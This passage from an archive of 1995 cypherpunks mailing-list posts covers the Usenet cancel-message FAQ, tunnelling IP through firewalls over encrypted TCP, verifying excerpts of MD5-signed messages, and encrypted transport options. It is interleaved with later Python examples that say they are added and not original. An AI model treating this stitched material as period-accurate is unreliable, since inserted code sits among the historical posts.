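                       ("wrapped copy", wrapped_copy),
                       ("edited copy", edited_copy)]:
        print(f"{name:13s} -> {diagnose(SIGNED, body)}")
```

A "rewrapped" result points at the mail client's wrapping setting rather
than at tampering, which is the case described in the message above.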





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Feb 95 17:48:11 PST
To: cypherpunks@toad.com
Subject: Judge not...
Message-ID: <199502060147.RAA25515@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's something I thought would probably be of interest to more than a
few here that read Usenet news.  First article is the "Cancel FAQ" put out
by the "Judges List", which many may have seen on the news.admin.*
groups.  Following it is the "Judges List" FAQ.  

I doubt this is a major threat, but is a good example of the sort of
thing that needs to be nipped in the bud.

If the "Cancel FAQ" doesn't trip any alarms, be sure to read the
following "Judges List" FAQ.  

Please pardon the length.

Articles follow:

Article xxxxx of news.admin.misc:
From: judges[tm]@arch.ping.dk (NetNews Judges[TM] List)
Newsgroups: news.admin.policy,comp.admin.policy,comp.security.misc,misc.legal.computing,news.admin.misc,news.groups.questions,news.groups,news.newusers.questions,alt.censorship,alt.comp.acad-freedom.talk,alt.current-events.net-abuse
Subject: Cancel Messages:  Frequently Asked Questions (FAQ)
Date: Sat, 4 Feb 95 16:29:13 +0100 (CET)
Organization: NetNews Judges[TM] List
Message-ID: <01050105.limupb@arch.ping.dk>
Reply-To: judges[tm]@arch.ping.dk (NetNews Judges[TM] List)
X-Mailer: uAccess - Macintosh Release: 1.6v2
Lines: 382


Cancel Messages:  Frequently Asked Questions (FAQ). Ver. 2.0


---------------------------------------------------------

Summary:

You can protect your reputation as an information source by 
cancelling articles posted under your name as soon as you 
discover that they are erroneous.

Cancelling others' articles, however, can expose you, 
your site, and the Net as a whole, to serious threats. The 
sender should be notified when articles need to be cancelled. 

Disputes or doubtful cases can be directed to the Judges' 
List for resolution.

---------------------------------------------------------

       List of Frequently Asked Questions


*** Purpose of this document

1) What are cancel messages?

2) How have cancel messages been used?

3) When should I issue a cancel message?

4) When should I not issue a cancel message?

5) What should I do when in doubt about whether a 
cancel is appropriate?

6) What should I do if I receive a request to 
cancel one of my own messages?

7) How can I request that a message be cancelled 
when I can not do so myself?

8) What should I do if I suspect one of my 
posts has been improperly cancelled?

9) Why should I follow these guidelines?

*** Cancellation request form

*** Contributors to this FAQ

---------------------------------------------------------



***     Purpose of this document

This FAQ list serves as an introduction to cancel messages. 
More advanced information is presented in the document 
"Administration of Cancel Messages", which is directed to 
News system administrators. The objectives and operational 
procedures of Judges' List are specified and explained in the 
Judges-L FAQ, also available as the Welcome message for new 
subscribers to the List.


1)     What are cancel messages?

Cancel messages are special USENET messages from a class 
known as "Control" messages.  Control messages don't result 
in postings for people to read. Instead, they give 
instructions to the USENET server software at each site that 
gets the message.  A Cancel message is a control message that 
indicates that a particular message (named through its unique 
Message-ID) should be deleted.



2)     How have cancel messages been used?

Most commonly they are used when a person posts something 
they want to delete, correct, or retract.  One can cancel an 
old message and optionally issue a new one.  (There is a
better way to cancel and re-issue called Superseding, but 
most user programs do not support it.) 

Cancels are sometimes used by moderators of moderated 
newsgroups to delete messages that should not have been 
posted. 



3)     When should I issue a cancel message?

You should issue a cancel message if it becomes necessary to 
delete, correct, or retract one of your own posts.

You can issue a cancel message to delete a forgery: A message 
posted by someone else, that appears to be from you. A 
forgery can often be cancelled by you as if it were your own 
article. Such cancels should be reported to the Judges' List 
(see below).

Some victims of forgeries don't cancel them, but consider it 
sufficient to post disclaimers to the affected newsgroups 
alerting everyone to the forgery. This is wise, in any case, 
since the forged message is likely to be seen by many people, 
even if it is cancelled.

The newsreaders rn, nn, and trn use "C" as the cancel 
command. In Rusnews type ":cancel" while reading the message 
to be deleted.




4)     When should I not issue a cancel message?

It is not appropriate to cancel an article posted by someone 
else. However, a forgery is an exception. 

A low-tech form of "forgery" is to insert fabricated quotes 
in an article. Such posts should be followed-up with a 
correction and the poster notified. 

Misattribution of quotations, as opposed to fabrication, is 
often a result of inferior news-reading software. Such posts 
can be followed-up with a correction and the poster should be 
notified. 

It is inappropriate to cancel someone else's writing simply 
because you find the opinions expressed offensive. You can, 
however, ask the author to cancel the offensive post. Your 
news-reading software should permit you to enter the names of 
offensive posters in a "kill" file. Then, you will not see 
articles from that person in the future. Ask your 
administrator to upgrade your software if your news-reading 
software does not have this capability.

The poster should be asked to cancel a chain letter or a 
libelous article, or any other post, such as an advertisement 
or pyramid scheme, that has inappropriate content.  A copy of 
the request should be directed to the postmaster at the 
originating site, if the content is unlawful.



5)      What should I do when in doubt about whether a cancel 
is appropriate?

Unless you are certain the poster is acting in bad faith, you 
should explain to the poster why you object to the post and 
ask that it be deleted. State that you are considering 
submitting a complaint to the Judges' List and explain how 
one can participate in the dispute-resolution process (see 
below). You may explain how the offending post, or a post 
that accomplishes the same objective, can be broadcast.  One 
source of information is a list of Frequently Asked 
Questions, "How to find the right place to post (FAQ)" in the 
newsgroup "news.newusers.questions".

If the post comes from your site, contact your postmaster or 
News administrator for an opinion about whether the article 
violates the site's usage agreement.

Doubtful cases can be submitted to the Judges' List, for an 
opinion.

A complaint to the Judges' List must include a:

     :complete copy of the offending post.

     :complete copy of your letter to the poster, requesting 
that the post be cancelled.

     :complete copy of any reply from the poster or a News 
administrator (only if permission to forward is not refused).

The complaint must have a subject line that starts with the 
characters "COMPLAINT: ", followed by the subject of the 
offending post.

If you receive additional information after submitting a 
complaint or wish to withdraw the complaint, the same subject 
line should be used.

Mail the complaint to JUDGES-L@UBVM.cc.buffalo.edu or 
JUDGES-L@UBVM.BITNET.

If you wish to participate in the discussion of the 
complaint, email to LISTSERV@UBVM.cc.buffalo.edu or 
LISTSERV@UBVM.BITNET with only the command:
SUB JUDGES-L <your-name-here>
in the message body. Replace the <your-name-here>, with your 
first and last name, in the above command.

Before making comments on the List, please wait for someone 
to respond to your complaint. If there is no response within 
a week, it is most likely that you did not file a 
satisfactory complaint (see above). If you find no error in 
your complaint and the problem still has not been resolved, 
send an additional message asking for help.



6)     What should I do if I receive a request to cancel one 
of my own messages?

If you do not agree that the request is valid, reply to the 
request with your reasons for not cancelling. If the request 
does not mention the Judges' List, refer to this FAQ and ask 
that you be notified if a complaint is submitted.



7)     How can I request that a message be cancelled when I 
can not do so myself?

If your software does not permit cancellation, or you are not 
confident in using it, ask your administrator to issue a 
cancel message for you.



8)     What should I do if I suspect one of my posts has been 
improperly cancelled?

If you suspect that your post has been improperly cancelled, 
contact your News administrator to rule out the possibility 
of a technical failure. If there has been an improper cancel, 
complete documentation should be directed to the Judges' 
List. Follow the procedures for submitting a complaint, but 
replace the characters "COMPLAINT: " with "CANCEL: ".



9)     Why should I follow these guidelines?

If you do not cancel erroneous articles that you have posted, 
you waste readers' time and damage your own reputation as a 
reliable source. Consider an article posted to a typical
newsgroup with 36,000 readers: a post that takes an average
of 1 second for each reader to deal with (i.e., examining
the subject line) uses a total of ten man-hours (36,000
seconds / 3,600 seconds/hour = 10 hours). If the article uses
up an average of four seconds, then the total time 
expenditure is 40 hours, the equivalent of a work-week. This 
is probably the minimum time expenditure on any article that 
is even selected for scanning. Thus, a few minutes spent 
cancelling an article can save a lot of time for readers. 
Groups with a lot of erroneous articles tend to lose readers, 
and articles posted to those groups reach a limited audience. 
By cancelling erroneous posts, you also reduce the risk that 
your name will be entered in numerous kill files, thus 
limiting the audience you can reach with your posts. Posting 
of apologies for faulty articles, such as those with an empty 
body, is to be avoided, since this wastes even more time of 
the reader, without supplying useful information.

If you abuse the cancel facility by cancelling others'
articles, you force people to take defensive actions. Many 
administrators have disabled cancels, because they have been 
abused. The disabling of cancels means that you will not be 
able to delete all copies of your own posts. Therefore, if 
you cancel an erroneous article and then post a corrected 
one, readers at certain sites will first see the erroneous 
one and then the corrected one. They may think that the 
corrected one is a duplicate and not read it. This situation 
is obviously of no benefit to posters or readers. If your 
site's administrator has disabled cancels, it is wise for you 
to notify your administrator when you issue a cancel, so at 
least it can be deleted at your site. 

Disabling of cancels does not prevent a cancel from working 
at all, since the cancel message can delete the cancelled 
article before it gets to a site where cancels are disabled. 
Therefore, a cancel will be most effective if it is issued 
immediately after the target article is posted. In some 
cases, robot posters have been used to immediately repost 
articles that have been cancelled. This can rapidly lead to a 
newsgroup being overloaded at a site where the cancel 
facility has been disabled. This type of conflict situation 
should be avoided, since it makes the newsgroup unusable for 
most readers. Cancel messages must be used with extreme care.

If you cancel articles based upon their content, you expose 
your site to a legal risk, since it can then be argued that 
you are taking responsibility for all articles' content, some 
of which may violate copyright or pornography laws, for 
example. Originating sites already are exposed to this risk;
therefore, they should be allowed to cancel such posts. They
should also have a user agreement that permits them to 
discipline a user, thus ensuring that repeated postings of 
this type do not occur, and thereby reducing the legal risk 
at all News sites. 

This is not a hypothetical risk. Many sites have been closed 
down, had their equipment seized, and their operators 
prosecuted, and in some cases jailed. The effectiveness of a 
common-carrier or "bookstore" type of defense has yet to be 
established (But see Mike Godwin <mnemonic@eff.org>. INTERNET 
LIBEL: IS THE PROVIDER RESPONSIBLE? Internet World, Nov./Dec. 
1993) [URL: ftp://ftp.eff.org/pub/CAF/lawlibel_1.IW]. The use 
of non-originating site cancels, to control content of 
articles, reduces the chances that such a defense can ever be 
established. This could make the risk of operating a News 
site unacceptable. Some sites have already been prohibited 
from operating moderated newsgroups or mailing lists by their 
legal counsel, because of the legal risk associated with 
assuming responsibility for content of distributed messages. 
The damage to USENET caused by the most extreme case of 
abusive posting was much less than that caused by external 
threats, even when those threats did not directly result in 
disruption of a News site. Therefore, in doubtful cases, 
cancel messages should not be issued. Notification of 
authorities external to the Net should be avoided. Contacts 
to the Press should be left to those who have been trained in 
public relations or have equivalent experience.

In order to minimize legal liability, you should, in the first
instance, try to stop abusive posting at the source. By
objecting directly to a poster of offensive material and 
making the person aware of this FAQ, you reduce the chances 
of repeated abuse.

In the case that a poster refuses to comply with a request
to cancel an article and you refer the matter to the Judges'
List, the conflict can be resolved in a way which benefits
the Net in the long term, and reduces the risk that you will
be subject to retaliation, for example, by having your posts
improperly cancelled. Complaints to the Judges' List also
permit a database of repeat abusers to be built up, with
much more effective resolution of such cases then becoming 
possible.



***     Cancellation request form

Sample reply to a poster requesting cancellation or 
explanation (not usable in cases where only the opinions 
expressed are offensive):

---------------------------------------------------------------
I object to your post, because ....

Please cancel this post and notify me that you have done so, 
or explain why you will not delete the post. Please note that 
any reply may be forwarded to the JUDGES-L list, unless 
explicit objection is given.

If I get no response, I will submit a complaint to the 
Judges' List. 

If you wish to participate in the discussion of the complaint 
on that List, email to LISTSERV@UBVM.cc.buffalo.edu or 
LISTSERV@UBVM.BITNET with only the command:
SUB JUDGES-L <your-name-here>
in the message body. Replace the <your-name-here>, with your 
first and last name, in the above command.
---------------------------------------------------------------



***     Contributors to this FAQ include:

Bob MacDowell <bobmacd@NETCOM.COM>
Tim Pierce <twpierce@midway.uchicago.edu>
David Stodolsky <david@arch.ping.dk>
Dimitri Vulis <dlv@dm.com>


================================================
Posted on behalf of the NetNews Judges(TM) List.
Judges-L Registrar,
dss


David S. Stodolsky, PhD  * Social *   Internet: david@arch.ping.dk
Tornskadestien 2, st. th.   * Research *    Tel.: + 45 38 33 03 30
DK-2400 Copenhagen NV, Denmark  * Methods *  Fax: + 45 38 33 88 80


And now, the "Judges List" FAQ:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 5 Feb 95 15:10:45 PST
To: cypherpunks@toad.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb7Za-0009tFC@sdwsys>
Message-ID: <YjBJeLe00bkR9JllAy@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


sdw@lig.net (Stephen D. Williams) wrote:

> UDP won't get through most firewalls.

I'm working on a program that gets around this.  It creates an IP tunnel
by setting up a SLIP interface on an encrypted TCP stream and routes
packets through that.  It's not completely finished but it does work. 
Send me mail if you want it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sun, 5 Feb 95 16:16:10 PST
To: cypherpunks@toad.com
Subject: RE: VINGE ON PKE ?
In-Reply-To: <m0rb1D8-0004IoC@s116.slcslip.indirect.com>
Message-ID: <60.19899.6525.0C1CE099@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:


EC+There is a class of people called "idiot savants" who contain people who can
  +also solve such
  +problems by inspection - their IQs are often much lower than 100, so that
  +blows Albert's theory.  These so-called "idiot savants" can easily factor
  +100 digit numbers.  The ability to solve such problems is not tied to IQ,
  +as there are many such people with IQs of 150+ who cannot solve them.

 
Many idiot savants can multiply extremely large numbers, though I have 
not read of numbers with a hundred digits being involved.  Factoring 
large numbers is an extremely different kettle of fish, and I know of 
no writing about idiot savants doing difficult factoring.  If you have 
references to any such performances, I'd like to read them.
 
Szent Georgi's remark was addressed to general intelligence in everyday 
life, not to bravura arithmetic.  My scepticism about all things IQish 
was supposed to be indicated by my use of quotation marks on "IQ".
 
                           Cheers,
 
                                -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * A piano is a piano is a piano. -- Gertrude Steinway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 16:08:37 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <YjBJeLe00bkR9JllAy@andrew.cmu.edu>
Message-ID: <9502060008.AA03105@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew J Ghio says:
> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > UDP won't get through most firewalls.
> 
> I'm working on a program that gets around this.  It creates an IP tunnel
> by setting up a SLIP interface on an encrypted TCP stream and routes
> packets through that.  It's not completely finished but it does work. 
> Send me mail if you want it.

Pardon but... why? What's the reason for wanting to do this?

If a firewall has been set up to stop UDP, then it should stop UDP. If
the firewall has not been set up to stop UDP, or has a mechanism like
the experimental versions of "socks" currently being played with that
relay UDP, then there is no reason to want to do the above. I don't
really understand what the idea is here.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 5 Feb 95 16:29:28 PST
To: cypherpunks@toad.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <9502060008.AA03105@snark.imsi.com>
Message-ID: <sjBKpHm00bkP0bX0Yx@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

> Pardon but... why? What's the reason for wanting to do this?
> 
> If a firewall has been set up to stop UDP, then it should stop UDP. If
> the firewall has not been set up to stop UDP, or has a mechanism like
> the experimental versions of "socks" currently being played with that
> relay UDP, then there is no reason to want to do the above. I don't
> really understand what the idea is here.

Presumably you would only let trusted people tunnel through your firewall.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 16:48:44 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <sjBKpHm00bkP0bX0Yx@andrew.cmu.edu>
Message-ID: <9502060048.AA03181@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew J Ghio says:
> "Perry E. Metzger" <perry@imsi.com> writes:
> 
> > Pardon but... why? What's the reason for wanting to do this?
> > 
> > If a firewall has been set up to stop UDP, then it should stop UDP. If
> > the firewall has not been set up to stop UDP, or has a mechanism like
> > the experimental versions of "socks" currently being played with that
> > relay UDP, then there is no reason to want to do the above. I don't
> > really understand what the idea is here.
> 
> Presumably you would only let trusted people tunnel through your firewall.

Fine -- then packet filter on your firewall. Of course, you can't
really trust the IP addresses anyway -- you need something IPSP-like
if you actually want to trust outside hosts (swIPe does nicely as a
stopgap). And even if one wanted to move packets through a firewall
over TCP, why use SLIP encapsulation? It was designed for unreliable
links -- on a reliable link, you can save lots of grief by just
sending the packet -- total length of an IP datagram is included
inside the datagram, thus rendering further encapsulation unnecessary.


Perry
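
Perry's framing point, as an added example that is not part of the original message or any program discussed in the thread: on a reliable byte stream the IPv4 Total Length field is enough to split datagrams, while SLIP (RFC 1055) adds an END byte plus escapes. It assumes IPv4 only; all names and the sample datagrams (documentation addresses) are constructed. Because a length-framed stream has no resynchronization marker, the receiver validates each header and fails closed.

```python
import struct

SLIP_END, SLIP_ESC, SLIP_ESC_END, SLIP_ESC_ESC = 0xC0, 0xDB, 0xDC, 0xDD

def slip_encode(datagram):
    """RFC 1055 framing: escape END/ESC bytes, then terminate with END."""
    out = bytearray()
    for byte in datagram:
        if byte == SLIP_END:
            out += bytes([SLIP_ESC, SLIP_ESC_END])
        elif byte == SLIP_ESC:
            out += bytes([SLIP_ESC, SLIP_ESC_ESC])
        else:
            out.append(byte)
    out.append(SLIP_END)
    return bytes(out)

def header_checksum(header):
    """One's-complement sum over 16-bit words; 0 means the header verifies."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_datagram(payload, src=bytes([192, 0, 2, 1]), dst=bytes([198, 51, 100, 2])):
    """Constructed sample: minimal IPv4 header (no options, protocol 17) + payload."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload),
                         0, 0, 64, 17, 0, src, dst)
    csum = header_checksum(header)
    return header[:10] + struct.pack("!H", csum) + header[12:] + payload

class DatagramStream:
    """Split a reliable byte stream into IPv4 datagrams using Total Length."""

    def __init__(self):
        self.buf = bytearray()

    def feed(self, chunk):
        """Add received bytes; return every datagram that is now complete."""
        self.buf += chunk
        datagrams = []
        while len(self.buf) >= 20:
            ihl = (self.buf[0] & 0x0F) * 4
            total_len = struct.unpack_from("!H", self.buf, 2)[0]
            # One bad length would misalign every later datagram, so any
            # implausible header ends the session instead of being skipped.
            if self.buf[0] >> 4 != 4 or ihl < 20 or total_len < ihl:
                raise ValueError("bad IPv4 header: stream is desynchronized")
            if len(self.buf) < total_len:
                break  # wait for the rest of this datagram
            if header_checksum(bytes(self.buf[:ihl])) != 0:
                raise ValueError("header checksum mismatch: closing stream")
            datagrams.append(bytes(self.buf[:total_len]))
            del self.buf[:total_len]
        return datagrams

def deframe_in_chunks(stream, chunk_size):
    """Feed the stream in arbitrary chunk sizes, as TCP reads would deliver it."""
    rx, out = DatagramStream(), []
    for off in range(0, len(stream), chunk_size):
        out += rx.feed(stream[off:off + chunk_size])
    return out
```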




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 5 Feb 95 16:45:30 PST
To: perry@imsi.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <9502060008.AA03105@snark.imsi.com>
Message-ID: <199502060048.TAA19441@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Matthew J Ghio says:
>> sdw@lig.net (Stephen D. Williams) wrote:
>> 
>> > UDP won't get through most firewalls.
>> 
>> I'm working on a program that gets around this.  It creates an IP tunnel
>> by setting up a SLIP interface on an encrypted TCP stream and routes
>> packets through that.  It's not completely finished but it does work. 
>> Send me mail if you want it.
>
>Pardon but... why? What's the reason for wanting to do this?
>
>If a firewall has been set up to stop UDP, then it should stop UDP. If
>the firewall has not been set up to stop UDP, or has a mechanism like
>the experimental versions of "socks" currently being played with that
>relay UDP, then there is no reason to want to do the above. I don't
>really understand what the idea is here.
>
>Perry
>

Actually, tunneling through a telnet connection on an application-level
firewall does have its place, especially when the firewall's
granularity of authentication is designed only to bind authorized
people to telnet connections.   This way, the firewall need only
enforce a very simple access control model (which is easier to
verify is working correctly) and need make very few authentication
decisions on a per-packet basis.

The down side (which is why I don't do this myself) is that you
have to be careful that the external end of the tunnel does not
forward IP packets from the rest of the net and is otherwise
reasonably secure, or one such connection is enough to eliminate
any security benefits the firewall might otherwise have offered.
It's not clear there's much a telnet firewall can do to prevent
tunnels, however, so we might as well at least make them secure as
we can.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 20:23:55 PST
To: cypherpunks@toad.com
Subject: Excerpts of signed messages
Message-ID: <199502060423.UAA18043@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


(I forget if this was posted here last year, it sounds familiar.)

Suppose I get a PGP-signed flaming message, full of insults, and at the
end it says, sarcastically, "For a stupid moron, you've made some very
nice postings."  I could choose to excerpt this last part, "...you've made
some very nice postings", and exhibit it in signed form.  What I would do
is to run the MD5 hash calculation on the first part of the message, saving
the internal state of that calculation.  I then publish just that MD5 state
along with the rest of the message.  Someone can check the signature by
initializing their MD5 to that state, then running the algorithm on the
part of the message I publish.  This will end up with the signed MD5
value from the signature.

The checker would know he was dealing with an excerpt, and that it came
from the end of the message, but he would have no way of knowing what
was in the part that was removed.

Presently of course PGP has no mechanism to check such signature
excerpts, but that could be added.  Under some circumstances this might
be a desirable feature.  But people would have to be aware of the
limitation that the excerptable portion would have to be the tail end of
the message.

Hal
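
The excerpt check described above, as an added example that is not Hal's code and not a PGP feature: a pure-Python MD5 that can resume from a published internal state. It assumes the signature covers the plain MD5 of the message bytes (signature verification itself is left out), and every name and the sample message are constructed. It shows two things the description leaves implicit: the cut has to fall on a 64-byte block boundary, and the checker also needs the length of the withheld part, because MD5 padding encodes the total length.

```python
import hashlib
import math
import struct

# MD5 constants from RFC 1321: rotation amounts, sine table, initial state.
_S = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 +
      [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4)
_K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
MASK = 0xFFFFFFFF
BLOCK = 64

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def _compress(state, block):
    """Absorb one 64-byte block into the four-word MD5 state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & MASK
        a, d, c = d, c, b
        b = (b + _rotl(f, _S[i])) & MASK
    return tuple((x + y) & MASK for x, y in zip(state, (a, b, c, d)))

def _padding(total_len):
    """MD5 padding for a message of total_len bytes (0x80, zeros, bit length)."""
    zeros = b"\x00" * ((55 - total_len) % BLOCK)
    return b"\x80" + zeros + struct.pack("<Q", (total_len * 8) & (2**64 - 1))

def make_excerpt(message, start):
    """Excerpter: withhold message[:cut], publish (state, cut, message[cut:]).

    The cut is rounded down to a block boundary, so up to 63 bytes before
    the wanted start are revealed as well.
    """
    cut = start - start % BLOCK
    state = IV
    for off in range(0, cut, BLOCK):
        state = _compress(state, message[off:off + BLOCK])
    return state, cut, message[cut:]

def digest_from(state, prefix_len, tail):
    """Checker: resume from the published state and finish the hash."""
    if prefix_len % BLOCK:
        raise ValueError("withheld prefix must be a whole number of blocks")
    data = tail + _padding(prefix_len + len(tail))
    for off in range(0, len(data), BLOCK):
        state = _compress(state, data[off:off + BLOCK])
    return struct.pack("<4I", *state)

def verify_excerpt(signed_digest, state, prefix_len, tail):
    """True if the excerpt is consistent with the digest that was signed."""
    return digest_from(state, prefix_len, tail) == signed_digest

# Constructed sample message; hashlib stands in for the signer's MD5.
MESSAGE = (b"[constructed sample] " + b"insult " * 20 +
           b"For a stupid moron, you've made some very nice postings.\n")
SIGNED_DIGEST = hashlib.md5(MESSAGE).digest()
```

The checker learns the length of the withheld part but nothing else about it; the published state is one compression-function output and does not reveal the blocks that produced it.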




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 5 Feb 95 20:32:42 PST
To: cypherpunks@toad.com
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502060202.AA03281@snark.imsi.com>
Message-ID: <199502060431.UAA18798@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry advocates IPSP as an almost-panacea for Internet security.  I
disagree.  I'll quote only the most relevant bits:

   From: "Perry E. Metzger" <perry@imsi.com>

   > I don't just want one or two encrypted applications -- like
   > the Kerberos telnet and rcp -- but something to transparently provide
   > privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
   > NNTP, X11, FTP, MUDs, etc.

   Well, in the long term, my hope is that people use IPSP for this. It
   will mean that the kernels on their machines simply deal with all this
   stuff and that userland applications get to ignore it 90% of the time.

   [...]

   However, I'd say that this isn't going to be a permanently deployed
   thing on the net -- that much we can be pretty sure of.

The basic problem with assuming IPSP as a universal encryption
solution is that it answers an incomplete threat model.  IPSP works
where you trust the endpoints but not the intermediates.  When you
don't trust the endpoints for silence, but do trust them for routing,
IPSP doesn't work.  Let me make this concrete:

TIA on netcom.

Suppose I'm running extruded netcom ports on winsock clients using TIA
to multiplex the serial line.  (Some of you may be doing this right
now.)  My Netscape connection is passing from my MS Windows machine
through netcom over the internet to my web server of the moment.  IPSP
doesn't provide end-to-end security in this case, because the endpoint
for the IP packet (netcom) doesn't coincide with the endpoint of the
actual connection (the home machine).  A maxim:

Trust boundaries are not the same as machine boundaries.

It's fallacious to argue simply that everyone's going to be _on_ the
Internet soon enough anyway, and that this problem will go away.
Absolutely not.  If anything, this kind of proxying for Internet
connectivity is going to become _more_ common, and that as a result
of cypherpunk projects for realtime proxy services, such as web and
ftp proxies.

You don't want to trust the proxy in an anonymization service to do
your crypto for you, just like (if you're smart) you won't trust your
secrets to netcom even for processes, much less for filesystems.  And
you can't say that all proxies are going to be IP-to-IP proxies,
either.  Some of them are going to be proxying the whole protocol,
some will participate partially, some not at all.  What this does
indicate, however, is that the need for peer-to-peer encryption will
be necessary at _each_ level of abstraction, and pretty much forever.

It will be an interesting and practical exercise in trust modeling to
figure out how to pass one layer's policy requirement for a secure
channel to a service offering at a lower layer.  The problems involved
here are going to be extremely difficult to make work for anything
approaching generality.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lrh@PrimeNet.Com (Dr. Lyman Hazelton)
Date: Sun, 5 Feb 95 19:34:50 PST
To: strick at The Yak <strick@yak.net>
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <199502060334.UAA09244@news.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I realize this may be heresy, but have you considered a hardware solution?
Cisco is currently offering a version of their popular routers with a builtin
Zylink crypto box... uses either DES or a "proprietary single bit CFB mode"
system (maybe RC4?) which is exportable.  The boxes are relatively
inexpensive.  Zylink offers just the crypto box for even less.  Both boxes
offer DH key management.

                                                                        Lyman

To obtain my PGP key, finger lrh@primenet.com or see
my Web page at http://www.primenet.com/~lrh/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 18:03:00 PST
To: strick at The Yak <strick@yak.net>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <199502060105.RAA07673@nando.yak.net>
Message-ID: <9502060202.AA03281@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



strick at The Yak says:
> I take your opinions more seriously than perhaps I should,

I don't want to scare people into not doing things -- but I do want to
inform. Persons taking my opinion, or that of any authority, on face
value without doing their own reasoning, get what they deserve.

> I'm not doing this to re-invent the wheel.  I'm doing it because
> I need it, and nothing else is working very well for me.

Then do it...

> I'm doing it because I don't see anything that's easy-to-use in wide
> use today.  I don't just want one or two encrypted applications -- like
> the Kerberos telnet and rcp -- but something to transparently provide
> privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
> NNTP, X11, FTP, MUDs, etc.

Well, in the long term, my hope is that people use IPSP for this. It
will mean that the kernels on their machines simply deal with all this
stuff and that userland applications get to ignore it 90% of the time.

> Let me name the ones I can think of.
> 
>   1.  	Matt Blaze just announced one.

>   2.	Kerberos4.  I use Kerberos4 between home and work all the time.
> 	However the only command I have that actually encrypts the
> 	session is the "rlogin" replacement.

And the telnet; however, it has a library to let you do whatever you want.

>       (But I sure use it, even if it's just DES.)

In v5 there is more general support, I believe.

> 	Also Kerberos administration is a nightmare.

That's really an interface issue, I think -- they have a lot of the
fundamental stuff down. If that's one's only complaint with Kerberos (I
have others) the "right thing" is to build a simplified administration
system. 

> 	And the reason big providers like The Well and Netcom won't
> 	run kerberos (or at least not the last time I asked) is that
> 	they would have to hire another person just to do the
> 	password management etc.

That's quite untrue -- passwords in kerberos are set by the users, not
by the administrators!


>   3.	Kerberos5.  I've been unable to build Kerberos5 on my 
> 	sun3.  Honestly.  To build it, I have to have ISODE, which seems 
> 	to be some enormous ISO thing that I haven't been able to build.
> 
> 	Again, not too encouraging for your average unix sys admin.

You only need ISODE for the ASN.1 compiler; you don't have to build
the whole thing.

>   5.	Standards for IPng.  Vapor, as far as I know.  Is there any
> 	usable code, that works in IP this generation?

There is swIPe, and the derived TIS product. It's a bit primitive since
it doesn't handle per-socket keying. There is stuff that I'm hacking
on between flames -- it's going to be called swIPe II. It will conform
to my RFC drafts and should run out of the box on any 4.4BSD
system. I'm hoping people will back-port it to SunOS and the like.

There is also SSL, which is what the Netscape people are pushing --
stands for Secure Sockets Layer.

